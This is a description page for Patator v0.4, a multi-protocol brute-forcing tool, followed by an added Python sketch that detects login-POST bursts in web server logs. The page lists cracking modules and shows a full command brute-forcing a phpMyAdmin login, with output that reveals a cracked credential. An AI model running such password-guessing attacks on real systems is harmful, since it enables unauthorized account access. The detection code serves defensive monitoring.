Patator is a multi-purpose brute-forcer with a modular design and flexible usage. It is NOT script-kiddie friendly.
Currently (v0.4) it supports the following modules:
* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz : Brute-force HTTP/HTTPS
* pop_login : Brute-force POP
* pop_passd : Brute-force poppassd (not POP3)
* imap_login : Brute-force IMAP
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* mysql_query : Brute-force MySQL queries
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Brute-force DNS
* dns_reverse : Brute-force DNS (reverse lookup subnets)
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
Usage example:
- HTTP : Brute-force phpMyAdmin logon
$ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST \
  body='pma_username=COMBO00&pma_password=COMBO01&server=1&lang=en' 0=combos.txt follow=1 accept_cookie=1 \
  -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
10:55:50 patator INFO - Starting Patator v0.4 (http://code.google.com/p/patator/) at 2012-06-29 10:55 EST
10:55:50 patator INFO - ---------------------------------------------------------------
10:55:50 patator INFO - code & size | candidate | num | mesg ..
10:55:50 patator INFO - ---------------------------------------------------------------
10:55:50 patator INFO - 200 8209:7075 | root: | 22 | HTTP/1.1 200 OK
10:55:51 patator INFO - 200 3838:2566 | root:p@ssw0rd | 44 | HTTP/1.1 200 OK
^C
10:55:52 patator INFO - Hits/Done/Size/Fail: 2/125/2342/0, Avg: 47 r/s, Time: 0h 0m 2s
10:55:52 patator INFO - To resume execution, pass --resume 12,13,12,13,12,12,13,13,13,12
Payload #22 was a false positive:
$ cat /tmp/qsdf/22_200_8209\:7075.txt
...
<div class="error">Login without a password is forbidden by configuration (see AllowNoPassword)</div>
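From the server side, a run like the one above appears as a burst of POSTs to the phpMyAdmin login URL from one source. The following detection sketch is an added example, not part of Patator or the original page; it assumes an Apache/nginx combined-format access log, and the function names, thresholds and sample addresses are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined Log Format: ip - user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def detect_login_bruteforce(lines, login_path="/phpmyadmin/index.php",
                            window_s=10, threshold=20):
    """Return {ip: peak POST count within window_s} for sources at or over threshold.

    Status codes are ignored on purpose: the failed attempt #22 in the run
    above still returned 200, so status alone does not separate failed
    logins from successful ones. Request rate is the usable signal.
    """
    recent = defaultdict(deque)   # ip -> timestamps inside the sliding window
    peaks = defaultdict(int)      # ip -> largest window population seen
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue              # skip malformed lines and non-login traffic
        if m["path"].split("?", 1)[0] != login_path:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp()
        q = recent[m["ip"]]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()           # drop requests that fell out of the window
        peaks[m["ip"]] = max(peaks[m["ip"]], len(q))
    return {ip: n for ip, n in peaks.items() if n >= threshold}

def sample_log():
    """Constructed access-log lines (not from the page): one noisy source, one normal user."""
    fmt = '{ip} - - [29/Jun/2012:10:55:{s:02d} +1000] "{req} HTTP/1.1" 200 {size} "-" "-"'
    lines = [fmt.format(ip="192.0.2.50", s=50 + i // 47, size=8209,
                        req="POST /phpmyadmin/index.php") for i in range(94)]
    lines.append(fmt.format(ip="198.51.100.7", s=51, size=3838,
                            req="POST /phpmyadmin/index.php"))
    lines.append(fmt.format(ip="198.51.100.7", s=52, size=512,
                            req="GET /phpmyadmin/themes/style.css"))
    lines.append("malformed line that the parser must skip")
    return lines

if __name__ == "__main__":
    for ip, n in detect_login_bruteforce(sample_log()).items():
        print(f"{ip}: {n} login POSTs within 10s")
```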
Download/Source: patator